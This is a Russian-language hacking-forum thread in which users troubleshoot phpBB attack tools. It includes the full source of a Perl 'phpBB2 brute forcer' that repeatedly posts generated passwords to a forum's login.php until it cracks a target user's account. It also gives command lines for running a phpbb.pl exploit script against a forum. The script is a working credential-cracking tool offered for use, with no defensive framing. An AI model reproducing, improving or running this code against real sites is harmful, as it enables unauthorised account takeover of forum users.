xmm

конечно существуетюзай поиск сдесь K1borg писал
вот ссылко
http://forum.antichat.ru/showpost.php?p=474307&postcount=7
ЗЫ и впредь ЮЗЬ поиск

xmm

здрасте приехали это все таки брутер а не миксер блин

xmm

Да мне тоже интерестно как?=)

выдрать - собрать словарь - пробрутить.

тоже попробовал - давно юзаю этот .pl, но именно с брутом непонятки - зарегился на форуме, сделал в той же папке, где и phpbb.pl файл pass.txt, в нем ТОЛЬКО один мой пароль (правильный), запускаю, начинается брут, НО РЕЗУЛЬТАТЫ никуда не сохраняются и в процессе работы ничего не показывается (т.е. в других режимах все пишется в log.txt - а в режиме брута вообще трудно понять, делается ли что-нибудь в принципе, и если есть ошибки - то какие. Запускаю так (чтобы все видно было):

cmd /k C:\Perl\bin\wperl.exe C:\Perl\bin\Sploits\phpbb.pl -v3 -uhttp://forum/index.php -lVassia -fpass.txt

т.е. брут не работает, или где?:) Версия форума 2.020

Инфо о форуме включая серверный путь успешно выдрал. При сканировании неподдерживаемых версий форума скрипт в лог все-равно пишет "ну не могу я поломать". А тут тишина.

#!/usr/bin/perl

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);

$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars

print q(
################################################## #########
# phpBB2 brute forcer #
# http://www.unnamedone.com #
# brian_denys@hotmail.com #
# 12 - April - 2008 #
################## Coded By UnnamedOne ####################
);

if (@ARGV < 4)
{
print " # I am not responsible for anything that you do with this!\n";
print " # This has been tested on phpBB2!\n";
print " # usage : phpbb2.pl [host & path] [user] [pass] [target]\n";
print " # E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n";
exit();
}

fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
crack($t);
}

sub fakelogin
{
$xplr = LWP::UserAgent->new() or die;
$cookie_jarr = HTTP::Cookies->new();
$xplr->cookie_jar( $cookie_jarr );
$resr = $xplr->post($url.'login.php',
Content => [
"username" => "$usern",
"password" => "$passw",
"login" => "Log in",
"newregister" => "Register",
],);
if($cookie_jarr->as_string =~ /%22%3B%7D/) {
#Do nothing..
}
else
{
print $cookie_jarr->as_string;
print "Forum not vulnerable or wrong username / password.\n";
exit();
}
}

sub crack
{
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++)
{
$RawString[i] = 0;
}
$Start = gettimeofday();
do {
for (my $i =0;$i<$CharSet;$i++) {
if ($RawString[$i] > length($alpha)-1) {
if ($i==$CharSet-1)
{
$cnt = 0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
$ret = "";
for (my $i =0;$i<$CharSet;$i++) {
$ret = $ret . substr($alpha,$RawString[$i],1);
}
$count++;
if($count == 4) {
#fakelogin();
$count = 0;
}
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'login.php',
Content => [
"username" => "$uname",
"password" => "$ret",
"login" => "Log in",
"newregister" => "Register",
],);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr) {
$cnt = int($cnt/$dbgtmr);
$Start = gettimeofday();
}
$logins++;
system("clear");
$pro = ($logins / ($charcount * $maxchars));
print "Current password: $ret\n";
print "Login attempts: $logins\n";
print "Cracking speed: $cnt passwords/sec\n";
print "$pro% finished.\n";
$cnt = 0;
if($cookie_jar->as_string =~ /%22%3B%7D/) {
print "Password cracked! => $ret\n";
exit();
}
$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));
}

Если не трудно, как расшифровать эту строчку:

usage : phpbb2.pl [host & path] [user] [pass] [target]\n

В принципе понятно, только непонятно откуда что берется:)

И особенно с target непонятно. Здесь вообще брут по словарю одного юзера или что?

Запускаю - ноль эмоций, ни сообщений об ошибке, ничего вообще

Я понимаю, что пример есть:

E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n

что такое в данном случае UnnamedOne, MyPass и str0ke\n???

Имя юзера какого-то, какой-то мой Пароль и строка какая-то:)

брут хорошо работает, а вот врубил -v1 , и что вот это значит DEBUG: forum_id: [54]
DEBUG: topic_id: [15068]